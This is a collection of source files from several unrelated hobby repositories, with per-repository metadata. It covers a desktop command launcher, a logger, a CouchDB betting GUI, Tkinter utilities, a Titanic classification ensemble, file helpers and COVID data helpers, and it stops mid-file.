entries: List[Entry] = []
def __init__(self, *, ranked_entries: List[Entry]):
self.entries = ranked_entries
def get_only_names(self) -> List[str]:
return [entry.name for entry in self.entries]
class InvertedIndex:
"""
The entity that gets persisted to disk
"""
entries: List[Entry]
@staticmethod
def from_entries_dict(dict: dict) -> InvertedIndex:
instance = InvertedIndex()
instance.entries = []
for key, value in dict.items():
instance.entries.append(Entry(name=key, value=value))
return instance
def serialize(self) -> str:
pass
```
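A short sketch showing how these entities compose (entry values invented for illustration):

```python
entries = {
    "open mail": {"url": "https://mail.example.com"},
    "say hi": {"cmd": "echo hi"},
}

index = InvertedIndex.from_entries_dict(entries)
first = index.entries[0]
print(first.serialize())      # open mail {'url': 'https://mail.example.com'}
print(first.has_embedding())  # False: no embedding was attached

ranking = Ranking(ranked_entries=index.entries)
print(ranking.get_only_names())  # ['open mail', 'say hi']
```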
#### File: search_run/interpreter/base.py
```python
from __future__ import annotations
import json
from grimoire.desktop.clipboard import Clipboard
from grimoire.desktop.dmenu import Dmenu
from grimoire.desktop.window import Window
from grimoire.logging import logging
from grimoire.notification import send_notification
from grimoire.shell import shell
from search_run.context import Context
class BaseInterpreter:
"""parent of all interpreters, Cannot instantiate directly"""
def __init__(self, cmd, context: Context):
self.cmd = cmd
self.context = context
def default(self) -> None:
if "ask_confirmation" in self.cmd and not self._confirmed_continue():
return
if "call_after" in self.cmd or "call_before" in self.cmd:
logging.info("Enabled sequential execution flag enabled")
self.context.enable_sequential_execution()
if "disable_sequential_execution" in self.cmd:
self.context.disable_sequential_execution()
logging.info("Disable sequential execution flag enabled")
self._call_before()
self.interpret_default()
self._call_after()
def _confirmed_continue(self) -> bool:
result = Dmenu(
title=f"Type (y) if you wanna to proceed to run command: {self.cmd['cmd']}"
).rofi()
if result == "y":
return True
send_notification(f"Operation cancelled. Confirmation response was '{result}'")
return False
def _call_before(self):
if "call_before" not in self.cmd:
return
logging.info("Call before enabled")
logging.info(f"Executing post-processing cmd {self.cmd['call_before']}")
self.context.get_interpreter().default(self.cmd["call_before"])
def _call_after(self):
if "call_after" not in self.cmd:
return
logging.info("Call after enabled")
logging.info(f"Executing post-processing cmd {self.cmd['call_after']}")
self.context.get_interpreter().default(self.cmd["call_after"])
def interpret_default(self):
raise Exception("Implement me!")
def interpret_clipboard(self):
return Clipboard().set_content(self.copiable_part())
def copiable_part(self):
return self.serialize()
def serialize(self):
return str(self.cmd)
def to_dict(self):
return self.cmd
def serialize_entry(self):
return json.dumps(self.cmd)
def apply_directory(self, cmd):
if "directory" in self.cmd:
cmd = f'cd {self.cmd["directory"]} ; {cmd}'
return cmd
def try_to_focus(self) -> bool:
"""
Uses i3 infrastructure to focus on windows if they are already opened
:return:
"""
if "focus_match" not in self.cmd:
return False
focus_identifier = self.cmd["focus_match"]
match_type = self.cmd["match_type"] if "match_type" in self.cmd else "title"
if "focus_match_only_class" in self.cmd:
match_type = "class"
if Window().focus(focus_identifier, match_type=match_type):
logging.info(
"No window after focusing? Maybe it is resized small, try to close the window after focusing."
)
if shell.run(
f"i3-msg '[{match_type}=\"{focus_identifier}\"] scratchpad show'"
):
shell.run('sleep 0.5; i3-msg "floating disable; floating enable"')
else:
shell.run(
f"i3-msg '[{match_type}=\"{focus_identifier}\"] scratchpad show'"
)
return True
return False
```
#### File: search_run/interpreter/snippet.py
```python
from grimoire.desktop.clipboard import Clipboard
from grimoire.shell import shell
from search_run.exceptions import CommandDoNotMatchException
from search_run.interpreter.base import BaseInterpreter
class SnippetInterpreter(BaseInterpreter):
def __init__(self, cmd, context):
self.context = context
if type(cmd) is dict and "snippet" in cmd:
self.cmd = cmd
return
raise CommandDoNotMatchException(
f"Not Valid {self.__class__.__name__} command {cmd}"
)
def interpret_default(self):
Clipboard().set_content(self.cmd["snippet"])
if "type-it" in self.cmd:
snippet = self.apply_directory(self.cmd["snippet"])
shell.run(f"setxkbmap ; xdotool type '{snippet}'")
shell.run(f"xdotool key Return ")
return
def copiable_part(self):
return self.cmd["snippet"]
```
#### File: search_run/ranking/ranking_generator.py
```python
from __future__ import annotations
import json
import logging
from collections import namedtuple
from typing import List, Tuple
from search_run.base_configuration import BaseConfiguration
from search_run.events.latest_used_entries import LatestUsedEntries
from search_run.observability.logger import configure_logger
logger = configure_logger()
class RankingGenerator:
"""
Write to the file all the commands and generates shortcuts
"""
ModelInfo = namedtuple("ModelInfo", "features label")
model_info = ModelInfo(["position", "key_lenght"], "input_lenght")
def __init__(self, configuration: BaseConfiguration):
self.configuration = configuration
self.cached_file = configuration.cached_filename
def generate(self):
"""
Recomputes the rank and saves the results on the file to be read
"""
entries: dict = self.load_entries()
result = []
latest_used = LatestUsedEntries().get_latest_used_keys()
used_entries = []
for used_key in latest_used:
if used_key not in entries or used_key in used_entries:
continue
used_entries.append((used_key, entries[used_key]))
del entries[used_key]
# reverse the list given that we pop from the end
used_entries.reverse()
increment = 1
for key in entries.keys():
increment += 1
if increment % 2 == 0 and len(used_entries):
used_entry = used_entries.pop()
logging.debug(f"Increment: {increment} with entry {used_entry}")
result.append(used_entry)
result.append((key, entries[key]))
return self._export_to_file(result)
def load_entries(self):
""" Loads the current state of the art of search run entries"""
return self.configuration.commands
def _export_to_file(self, data: List[Tuple[str, dict]]):
position = 1
for name, content in data:
try:
content["key_name"] = name
content["rank_position"] = position
content_str = json.dumps(content, default=tuple, ensure_ascii=True)
            except BaseException:
                # the entry could not be serialized as JSON; fall back to its string form
                content_str = str(content)
position = position + 1
content_str = f"{name.lower()}: " + content_str
content_str = content_str.replace("\\", "\\\\")
print(content_str)
```
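The interleaving inside generate() is the interesting part: one recently used entry is spliced in after every second base entry. The same logic in isolation, on toy data:

```python
entries = {"a": 1, "b": 2, "c": 3, "d": 4}
used_entries = [("z", 26), ("y", 25)]  # already reversed, popped from the end

result = []
increment = 1
for key in entries:
    increment += 1
    if increment % 2 == 0 and used_entries:
        result.append(used_entries.pop())
    result.append((key, entries[key]))

print(result)
# [('y', 25), ('a', 1), ('b', 2), ('z', 26), ('c', 3), ('d', 4)]
```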
#### File: search_run/search_ui/fzf_in_terminal.py
```python
import os
from search_run.observability.logger import logger
class FzfInTerminal:
"""
    Renders the search ui using fzf inside a kitty terminal
"""
FONT_SIZE = 14
PREVIEW_PERCENTAGE_SIZE = 50
HEIGHT=330
@staticmethod
def build_search_ui():
""" Assembles what is specific for the search ui exclusively"""
preview_cmd = "echo {} | cut -d ':' -f1 --complement | jq . -C "
return FzfInTerminal(height=FzfInTerminal.HEIGHT, width=1100, preview_cmd=preview_cmd)
def __init__(self, *, height, width, preview_cmd):
self.height = height
self.width = width
self.preview_cmd = preview_cmd
def run(self) -> None:
internal_cmd = f"""bash -c 'search_run ranking generate | \
fzf \
--cycle \
--no-hscroll \
--hscroll-off=0 \
--bind "alt-enter:execute-silent:(nohup search_run run_key {{}} & disown)" \
--bind "enter:execute-silent:(nohup search_run run_key {{}} & disown)" \
--bind "enter:+execute-silent:(hide_launcher.sh)" \
--bind "enter:+clear-query" \
--bind "ctrl-l:clear-query" \
--bind "ctrl-c:execute-silent:(nohup search_run clipboard_key {{}} & disown)" \
--bind "ctrl-e:execute-silent:(nohup search_run edit_key {{}} & disown)" \
--bind "ctrl-e:+execute-silent:(hide_launcher.sh)" \
--bind "ctrl-k:execute-silent:(nohup search_run edit_key {{}} & disown)" \
--bind "ctrl-k:+execute-silent:(sleep 0.2 ; hide_launcher.sh)" \
--bind "esc:execute-silent:(hide_launcher.sh)" \
--bind "ctrl-h:execute-silent:(hide_launcher.sh)" \
--bind "ctrl-r:reload:(search_run ranking generate)" \
--bind "ctrl-n:reload:(search_run nlp_ranking get_read_projection_rank_for_query {{q}})" \
--bind "ctrl-t:execute-silent:(notify-send test)" \
--bind "ctrl-q:execute-silent:(notify-send {{q}})" \
--bind "ctrl-d:abort" \
--preview "{self.preview_cmd}" \
--preview-window=right,{FzfInTerminal.PREVIEW_PERCENTAGE_SIZE}%,wrap \
--reverse -i --exact --no-sort'
"""
self._launch_terminal(internal_cmd)
def _launch_terminal(self, internal_cmd: str):
launch_cmd = f"""ionice -n 3 nice -19 kitty \
--title=launcher -o remember_window_size=n \
-o initial_window_width={self.width} \
-o initial_window_height={self.height} \
-o font_size={FzfInTerminal.FONT_SIZE} \
{internal_cmd}
"""
logger.info(f"Command performed:\n {internal_cmd}")
result = os.system(launch_cmd)
if result != 0:
raise Exception("Search run fzf projection failed")
```
#### File: search_run/tests/test_serialize.py
```python
import unittest
import pytest
from search_run.context import Context
from search_run.interpreter.main import Interpreter
from tests.utils import build_config
@pytest.mark.skipif(
True,
reason="not ready yet",
)
class SerializeTestCase(unittest.TestCase):
def test_cmd(self):
config = build_config({"test jean": "pwd"})
interpreter = Interpreter(config, Context())._get_interpeter("test jean")
result = interpreter.serialize_entry()
assert result == '"pwd": {"cmd": "pwd"}'
```
|
{
"source": "jeanCarlosDev/heimdall-logger",
"score": 3
}
|
#### File: heimdall_logger/format_log/template.py
```python
class Pattern(object):
"""
[summary]
"""
@staticmethod
def default() -> str:
"""[summary]
Returns:
pattern (str): [{level}][{datetime}] - {transaction} - {project_name}.{class_name}.{function_name} - _message: traceback
"""
_message = "{message}"
_title_pattern: str = "[{level}][{datetime}] - {transaction} - "
_name_pattern: str = "{project_name}.{class_name}.{function_name} - "
_loggger_pattern = f"{_title_pattern}{_name_pattern}{_message}"
pattern = _loggger_pattern
return pattern
```
#### File: providers/log_file_system/filesystem_provider.py
```python
import aiofiles
from pathlib import Path
from heimdall_logger.constants.log_output_format import Extension
class File(object):
def __init__(
self,
file_path: str,
) -> None:
"""
[summary]
Args:
file_path (str): [description]
"""
self.file_path = file_path
def write_file(self, data: str) -> None:
"""
[summary]
Args:
data (tuple): [description]
"""
_path: str = self.file_path
print("path: ", _path)
print("data: ", data)
with open(file=_path, mode="a") as out:
out.write(data)
out.write("\n")
out.flush()
out.close()
async def async_write_file(self, data: str) -> None:
"""
[summary]
Args:
data (tuple): [description]
"""
_path: str = self.file_path
        async with aiofiles.open(file=_path, mode="a") as out:
            await out.write(data)  # write, not writelines: data is a single string
            await out.write("\n")  # the async context manager flushes and closes on exit
```
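A quick sketch of both write paths (the log path is a placeholder):

```python
import asyncio

log_file = File("/tmp/heimdall.log")
log_file.write_file("sync entry")

# the async variant must run inside an event loop
asyncio.run(log_file.async_write_file("async entry"))
```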
#### File: heimdall_logger/utils/probe.py
```python
from typing import List, Tuple
from inspect import FrameInfo
class Probe(object):
"""
[summary]
"""
@staticmethod
def inspect_namespaces_from(stack: List[FrameInfo]) -> Tuple[str, str]:
"""[summary]
Args:
stack (List[FrameInfo]): [description]
Returns:
Tuple[str, str]: [description]
"""
frame = stack[1]
frame_info = frame[0]
self_object = frame_info.f_locals.get(
'self',
None
)
class_name = self_object.__class__.__name__ if self_object else frame[1]
function_name = frame[3]
return class_name, function_name
```
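The probe expects the stack captured inside a logging helper, so that index 1 is the helper's caller; a self-contained sketch:

```python
import inspect

def log_call():
    # stack[0] is log_call itself; Probe reads stack[1], the caller's frame
    class_name, function_name = Probe.inspect_namespaces_from(inspect.stack())
    print(f"{class_name}.{function_name}")

class Service:
    def handle(self):
        log_call()

Service().handle()  # prints: Service.handle
```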
|
{
"source": "Jeancasoto/ThePlaceToBet",
"score": 2
}
|
#### File: Jeancasoto/ThePlaceToBet/manageTeam.py
```python
from PyQt4 import QtCore, QtGui
from couchdb.mapping import Document, TextField, IntegerField, Mapping
from couchdb.mapping import DictField, ViewField, BooleanField, ListField
from couchdb import Server
import couchdb
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName(_fromUtf8("Dialog"))
Dialog.resize(688, 506)
self.label_2 = QtGui.QLabel(Dialog)
self.label_2.setGeometry(QtCore.QRect(40, 50, 251, 21))
font = QtGui.QFont()
font.setFamily(_fromUtf8("FreeSerif"))
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.lineEdit = QtGui.QLineEdit(Dialog)
self.lineEdit.setGeometry(QtCore.QRect(320, 50, 251, 29))
self.lineEdit.setObjectName(_fromUtf8("lineEdit"))
self.listView = QtGui.QListView(Dialog)
self.listView.setGeometry(QtCore.QRect(30, 190, 256, 192))
self.listView.setObjectName(_fromUtf8("listView"))
self.label_3 = QtGui.QLabel(Dialog)
self.label_3.setGeometry(QtCore.QRect(30, 160, 201, 21))
font = QtGui.QFont()
font.setFamily(_fromUtf8("FreeSerif"))
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label_3.setFont(font)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.listWidget = QtGui.QListWidget(Dialog)
self.listWidget.setGeometry(QtCore.QRect(360, 190, 256, 192))
self.listWidget.setObjectName(_fromUtf8("listWidget"))
self.label_4 = QtGui.QLabel(Dialog)
self.label_4.setGeometry(QtCore.QRect(370, 160, 201, 21))
font = QtGui.QFont()
font.setFamily(_fromUtf8("FreeSerif"))
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label_4.setFont(font)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.pushButton = QtGui.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(450, 400, 85, 27))
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.pushButton_2 = QtGui.QPushButton(Dialog)
self.pushButton_2.setGeometry(QtCore.QRect(550, 470, 121, 27))
self.pushButton_2.setObjectName(_fromUtf8("pushButton_2"))
self.pushButton_3 = QtGui.QPushButton(Dialog)
self.pushButton_3.setGeometry(QtCore.QRect(410, 470, 121, 27))
self.pushButton_3.setObjectName(_fromUtf8("pushButton_3"))
self.recuperarJugadores = QtGui.QPushButton(Dialog)
self.recuperarJugadores.setGeometry(QtCore.QRect(70, 400, 181, 29))
self.recuperarJugadores.setObjectName(_fromUtf8("recuperarJugadores"))
        # connect to the handler defined below
self.recuperarJugadores.clicked.connect(self.recuperarEquipo)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(_translate("Dialog", "Dialog", None))
self.label_2.setText(_translate("Dialog", "Nombre de la institucion deportiva", None))
self.label_3.setText(_translate("Dialog", "Jugadores que forman parte ", None))
self.label_4.setText(_translate("Dialog", "Agregar jugadores", None))
self.pushButton.setText(_translate("Dialog", "Agregar", None))
self.pushButton_2.setText(_translate("Dialog", "Aceptar", None))
self.pushButton_3.setText(_translate("Dialog", "Cancelar", None))
self.recuperarJugadores.setText(_translate("Dialog", "Recuperar Jugadores", None))
def recuperarEquipo(self):
serverCDB = Server()
db = serverCDB['quinelas']
lists = db.view('queries/getJugadores')
self.listWidget.clear()
for item in lists:
docTemp = item.value
print(docTemp['content']['nombre'])
jNombre = docTemp['content']['nombre']
jApellido = docTemp['content']['apellido']
#jFecha = docTemp['content']['fechaN']
#jRol = docTemp['content']['rol']
jPeso = docTemp['content']['peso']
listRow = jNombre+" "+jApellido+" - "+str(jPeso)
self.listWidget.addItem(listRow)
#for item in db.view('queries/getJugadores'):
# print(item.key._id)
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
Dialog = QtGui.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
```
#### File: Jeancasoto/ThePlaceToBet/memame.py
```python
from random import randint
equipos = ['A','B','C','D','E','F','G','H','I','J','K','M','N','O','P']
contador_jornada =1
# there is a list of the matchups already played; a pairing cannot occur more than once per season
#def enfrentamientos(self):
lista_partidos_totales =[]
# each matchday has 14 matches (n-1)
jornada =contador_jornada
# there are home and away teams
for i in range(len(equipos)):
lista_partidos = []
while len(lista_partidos) <14:
ran1=randint(0,len(equipos)-1)
ran2=randint(0,len(equipos)-1)
partido = equipos[ran1]+"-"+equipos[ran2]
if partido not in lista_partidos_totales:
print "No se ha jugado en otra fecha"
lista_partidos_totales.append(partido)
if partido not in lista_partidos:
print ("No se ha jugado esta jornada")
lista_partidos.append(partido)
else:
print "El partido ya se jugo en esta jornada "
else:
            print 'The match was apparently already played on another date'
print "Jornada-> ", contador_jornada
print "Lista partidos:"
#for j in len(lista_partidos):
# print 'Juego:'+j+" "+lista_partidos[j]
print lista_partidos
contador_jornada+=1
```
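The random pairing above can redraw indefinitely and may even pair a team against itself; for comparison, a deterministic Python 3 sketch of the classic circle-method round robin (not part of the original repo):

```python
def round_robin(teams):
    """Yield one list of (home, away) pairs per matchday; each pairing occurs once."""
    teams = list(teams)
    if len(teams) % 2:
        teams.append(None)  # odd team count: add a bye
    n = len(teams)
    for _ in range(n - 1):
        yield [(teams[i], teams[n - 1 - i]) for i in range(n // 2)
               if teams[i] is not None and teams[n - 1 - i] is not None]
        teams.insert(1, teams.pop())  # rotate every team except the first

for matchday, pairs in enumerate(round_robin(['A', 'B', 'C', 'D']), start=1):
    print(matchday, pairs)
```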
|
{
"source": "jean-charles-gibier/TrafficLights",
"score": 3
}
|
#### File: TrafficLights/tests/test_trafficlights.py
```python
import unittest
from trafficlights.trafficlight import Trafficlight
class MyTestTrafficlights(unittest.TestCase):
def test_simple_instance(self):
# Test "Créer un nouveau feu dans un état spécifié"
traffic = Trafficlight("UK", current="rouge")
# Test "Connaître l'état du feu"
self.assertEqual(traffic.get_current(), "rouge")
        # add the UK states & transitions
traffic.add("next", "rouge", "rouge_et_jaune")
traffic.add("next", "rouge_et_jaune", "vert")
traffic.add("next", "vert", "jaune")
traffic.add("next", "jaune", "rouge")
# Test "Passer le feu au prochain état de la séquence"
traffic.next()
        # should go from "rouge" to "rouge_et_jaune"
self.assertEqual(traffic.get_current(), "rouge_et_jaune")
        # next sequence (nominal, allowed case)
traffic.set_current("vert")
self.assertEqual(traffic.get_current(), "vert")
        # force an invalid transition (error case)
traffic.set_current("rouge")
        # the value stayed the same
self.assertEqual(traffic.get_current(), "vert")
if __name__ == "__main__":
unittest.main()
```
|
{
"source": "Jeanchichi/Python",
"score": 3
}
|
#### File: Python/Notepad/library.py
```python
from tkinter import *
from tkinter import filedialog  # the star-import does not pull in the filedialog submodule
import os
savedFile = {1:""}
class Win:
def create(self):
self.master = Tk()
self.master.title("Notepad")
self.master.geometry("720x480")
self.master.minsize(720, 480)
self.master.config(background='#272C35')
def add_text(self):
        self.content = Text(self.master, font=("arial", 11), bg='#272C35', fg='#fff', width='720', height='480')
self.content.pack(expand=1, fill='both')
def generate(self):
self.master.mainloop()
def add_menu(self):
menuBar = Menu(self.master)
menuFichier = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label="File", menu=menuFichier)
menuFichier.add_command(label="New", command=self.new)
menuFichier.add_command(label="Open", command=self.fopen)
menuFichier.add_command(label="Save", command=self.save)
menuFichier.add_command(label="Save as", command=self.saveAs)
menuFichier.add_command(label="Exit", command=self.quitter)
self.master.config(menu=menuBar)
menuEdition = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label="Edit", menu=menuEdition)
menuEdition.add_command(label="Cancel")
menuEdition.add_command(label="Restore")
menuEdition.add_command(label="Copy", command=self.copy)
menuEdition.add_command(label="Cut", command=self.cut)
menuEdition.add_command(label="Paste", command=self.past)
menuOutils = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label="Tools", menu=menuOutils)
menuOutils.add_command(label="Preferences")
menuAide = Menu(menuBar, tearoff=0)
menuBar.add_cascade(label="Help", menu=menuAide)
menuAide.add_command(label="About")
def quitter(self):
self.master.quit()
def new(self):
os.popen("python main.py")
def fopen(self):
file = self.master.filename = filedialog.askopenfilename(initialdir="/", title="Select File", filetypes=(
("Text Files", "*.txt"), ("all files", "*.*")))
fp = open(file, "r")
r = fp.read()
self.content.insert(1.0, r)
def saveAs(self):
# create save dialog
        fichier = self.master.filename = filedialog.asksaveasfilename(
            initialdir="/", title="Save As",
            filetypes=(("Text Files", "*.txt"), ("All Files", "*.*")))
        fichier = fichier + ".txt"
        # use the dictionary to store the current file path
savedFile[1] = fichier
f = open(fichier, "w")
s = self.content.get("1.0", END)
f.write(s)
f.close()
def save(self):
if savedFile[1] == "":
self.saveAs()
else:
f = open(savedFile[1], "w")
s = self.content.get("1.0", END)
f.write(s)
f.close()
def copy(self):
self.content.clipboard_clear()
self.content.clipboard_append(self.content.selection_get())
def past(self):
self.content.insert(INSERT, self.content.clipboard_get())
def cut(self):
self.copy()
self.content.delete("sel.first", "sel.last")
```
#### File: Python/QR-Code-Generator/main.py
```python
import os
import pyqrcode
from tkinter import *
import tkinter.ttk as ttk
from ttkthemes import ThemedTk
from PIL import Image,ImageTk
win = ThemedTk(theme="equilux")
win.title("QR Code Generator")
win.config(background="#181818")
def Generate():
text = entryl.get()
qr = pyqrcode.create(text)
file_name = "my qrcode"
save_path = r'C:\Users\Jeceey\Downloads\ '
name = save_path+file_name+'.png'
qr.png(name, scale=10)
image = Image.open(name)
image = image.resize((400, 400), Image.ANTIALIAS)
image = ImageTk.PhotoImage(image)
    win.imagelabel.config(image=image)
    win.imagelabel.image = image  # keep a reference so the image is not garbage-collected
text = ttk.Label(win, text= "Enter text or link :")
text.grid(row=0, column=0, padx=0, pady=3)
entryl = ttk.Entry(win, width=40)
entryl.grid(row=0, column=1, padx=3, pady=3)
button = ttk.Button(win, text="Generate", command=Generate)
button.grid(row=0, column=2, padx=3, pady=3)
show_qr = ttk.Label(win, text="QR Code :")
show_qr.grid(row=1, column=0, padx=3, pady=3)
win.imagelabel = ttk.Label(win, background='#181818')
win.imagelabel.grid(row=2, column=0, padx=3, pady=3, columnspan=3)
win.mainloop()
```
#### File: Python/URL-Shortener/main.py
```python
import pyshorteners
import tkinter as tk
from tkinter import ttk
from tkinter import *
from tkinter.messagebox import showinfo
win = tk.Tk()
win.title("URL Shortener")
def short():
url = entry_url.get()
shorted_url = pyshorteners.Shortener()
url_info = shorted_url.tinyurl.short(url)
entry_url.delete(0, END)
entry_url.insert(0, url_info)
url_label = tk.Label(win, text="Enter URL Here :")
url_label.grid(row=0, column=0)
entry_url = tk.Entry(win, width=30, bg="#69BEF6", bd=2)
entry_url.grid(row=0, column=1, padx=5, pady=5)
button = ttk.Button(win, text="Short", command=short)
button.grid(row=1, column=0, columnspan=2)
win.mainloop()
```
|
{
"source": "JeanCHilger/kaggle-titanic-challenge",
"score": 3
}
|
#### File: JeanCHilger/kaggle-titanic-challenge/main.py
```python
import csv
import pandas as pd
import random
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.svm import SVC
from sklearn.naive_bayes import GaussianNB, BernoulliNB
from sklearn.linear_model import SGDClassifier, LogisticRegressionCV
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.neural_network import MLPClassifier
raw_data = pd.read_csv('./data/train.csv')
test_data = pd.read_csv('./data/test.csv')
##########################
# Data preprocessing
##########################
used_features = [
'Pclass',
# 'Name',
'Sex',
'Age',
'SibSp',
'Parch',
# 'Ticket',
'Fare',
# 'Cabin',
'Embarked'
]
label_encoder = LabelEncoder()
for dataset in [raw_data, test_data]:
# Imput missing values
dataset['Age'].fillna(dataset['Age'].median(), inplace = True)
dataset['Fare'].fillna(dataset['Fare'].median(), inplace = True)
# Remove remaining rows with nulls
dataset.dropna(subset=['Embarked'], axis=0, inplace=True)
# Encode features to discrete values
dataset['Sex'] = label_encoder.fit_transform(dataset['Sex'])
dataset['Embarked'] = label_encoder.fit_transform(dataset['Embarked'])
# TODO: infer new features?
# Split data into train and test
raw_y = raw_data.Survived
raw_X = raw_data[used_features]
X_train, X_test, y_train, y_test = train_test_split(
raw_X,
raw_y,
test_size=0.2,
random_state=1
)
##########################
# Model definition
##########################
def generate_svm_models(n_models=4):
'''
Creates and returns SVM models.
The parameters of the created models are
randomic choosen.
'''
models = []
for i in range(n_models):
models.append(
SVC(
C=random.uniform(0.9, 1.7),
kernel=random.choice(['linear', 'poly', 'rbf', 'sigmoid']),
# degree=random.randint(3, 4),
gamma=random.choice(['scale', 'auto'])
)
)
return models
model_titles = [
'Random Forest',
'Gradient Boost',
'Ada Boost',
'Multi-layer Perceptron',
'Gaussian NB',
'Bernoulli NB',
'Logistic Regression',
'SGD Classification',
'SVM 1',
'SVM 2',
'SVM 3',
]
models = [
RandomForestClassifier(
n_estimators=100,
random_state=1
),
GradientBoostingClassifier(
n_estimators=100,
random_state=1
),
AdaBoostClassifier(
n_estimators=50,
random_state=1
),
MLPClassifier(
max_iter=300
),
GaussianNB(),
BernoulliNB(),
LogisticRegressionCV(),
SGDClassifier(),
]
for svc_model in generate_svm_models(3):
models.append(svc_model)
models_ensemble = VotingClassifier(
estimators=[tuple(pair) for pair in zip(model_titles, models)]
)
models_ensemble.fit(X_train, y_train)
##########################
# Model evaluation
##########################
y_pred = models_ensemble.predict(X_test)
print('Ensemble Model')
print(classification_report(y_test, y_pred))
print()
##########################
# Submission
##########################
# predict on the actual Kaggle test set (y_pred above came from the validation split)
test_pred = models_ensemble.predict(test_data[used_features])
passenger_ids = list(test_data['PassengerId'])

with open('submission.csv', 'w') as submission_file:
    writer = csv.writer(submission_file)

    writer.writerow(['PassengerId', 'Survived'])

    for i in range(len(test_pred)):
        writer.writerow([passenger_ids[i], test_pred[i]])
```
|
{
"source": "jeanchilger/rsa",
"score": 4
}
|
#### File: rsa/utils/file_helper.py
```python
import shutil
from typing import Union
from pathlib import Path
def _get_path(path: Union[str, Path]) -> Path:
"""
Produces a Path object for the given string path.
If input is already a Path object, returns it.
Args:
path (Union[str, Path]): A path representation,
string or Path object.
Returns:
Path: Path object.
"""
if type(path) == str:
return Path(path.replace("\\", "/"))
return path
def create_dir(path: Union[str, Path]) -> None:
"""
Creates a folder, if not exists, at the given location.
Parent folders that don't exists are also created.
Args:
path (Union[str, Path]): Path to create a new directory.
"""
_path = _get_path(path)
if not _path.exists():
_path.mkdir(parents=True)
def create_file(path: Union[str, Path]) -> None:
"""
Creates an empty file at the given location.
Args:
path (Union[str, Path]): Path where the file should be created.
"""
_path = _get_path(path)
_path.touch()
def is_path(path: Union[str, Path]) -> bool:
"""
Returns whether or not the given path is a valid path.
To be valid, a path must lead to an existing location
and can't be an arbitrary text string.
Args:
path (Union[str, Path]): Path to check validity
Returns:
bool: True if given path is valid. False otherwise.
"""
    try:
        return _get_path(path).exists()
    except (OSError, ValueError):
        # malformed path strings can make exists() raise on some platforms
        return False
def read_txt_file(path: Union[str, Path]) -> str:
"""
Reads a file as plain text, returning the contents as a string.
Args:
path (Union[str, Path]): Path to file.
Returns:
str: File contents as plain text.
"""
_path = _get_path(path)
with open(_path, "r") as txt_file:
return txt_file.read().strip()
def write_txt_file(path: Union[str, Path], content: str) -> None:
"""
Writes the given content to the file at given location
as plain text.
Args:
path (Union[str, Path]): Path to file.
content (str): Text to write to file.
"""
_path = _get_path(path)
with open(_path, "w") as txt_file:
txt_file.write(content)
```
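A usage sketch of the helpers above, assuming the package layout in the file header and running from the repository root:

```python
from utils.file_helper import (create_dir, is_path,
                               read_txt_file, write_txt_file)

create_dir("tmp_demo/nested")  # parent folders are created as needed
write_txt_file("tmp_demo/nested/key.txt", "65537")

print(read_txt_file("tmp_demo/nested/key.txt"))  # 65537
print(is_path("tmp_demo/nested"))                # True
print(is_path("no/such/place"))                  # False
```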
|
{
"source": "JeanClaudeR/COVID19_Trends_by_Age",
"score": 3
}
|
#### File: COVID19_Trends_by_Age/src/helpers.py
```python
import numpy as np
from datetime import date, timedelta
# functions for regression
from sklearn.linear_model import Ridge
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
from src.mysettings import firsts_of_the_month
def delete_spaces(s):
"""Deletes all the spaces of a string
Parameters:
-----------
s : str
Returns
-----------
The corresponding string
"""
s = ''.join(i for i in s if i != ' ')
return s
def time_delta(date1,date2):
"""Gives the number of days between two dates
Parameters:
-----------
-date1 : str
the first date (format : 'DD MM YYYY')
-date2 : str
the second date (format : 'DD MM YYYY')
Returns:
-----------
Either -1 (wrong date format)
Or the number of days between the two dates (int)
"""
try:
day1, month1, year1 = int(date1[:2]), int(date1[3:5]), int(date1[6:10])
day2, month2, year2 = int(date2[:2]), int(date2[3:5]), int(date2[6:10])
delta = int((date(year2, month2, day2) - date(year1, month1, day1)).days)
except:
delta = -1
return delta
def computeDatecodeFromGap(n):
"""Computes a Datecode from a gap_in_day value
Parameters:
-----------
n : int
the number of days between the wanted date and 2020.01.01
Returns
-----------
datecode : int
the corresponding datecode
"""
D = date(2020, 1, 1) + timedelta(days = n)
D = str(D)
datecode = int(D[:4] + D[5:7] + D[8:10])
return datecode
def ageRange(row):
"""Gives the age range label for histogram
-----------
row : pandas Series
row of a dataset
Returns
-----------
label : str
the corresponding label
"""
if row.Age == 100:
label = '100-104'
else:
label = str(row.Age) + '-' + str(row.Age + 9)
return label
def regionError(df, C, R):
"""Detects if a selected region is not part of one of the selected countries
Parameters:
-----------
df : Pandas DataFrame
the original dataset
C : str list
list of selected countries
R : str list
list of selected regions
Returns
-----------
bool
True if the error is detected
"""
if C == None:
C = ['USA']
available_regions = list(regions_of_country(df, C)) + ['All_regions', 'All']
for region in R:
if not(region in available_regions):
return True
return False
def adaptMetricsInterval(metrics, interval):
"""Transforms the selected metrics and the time interval (daily, weekly, etc.) into a understandable metrics
Parameters:
-----------
metrics : str list
list of cumulatives selected metrics
interval : str
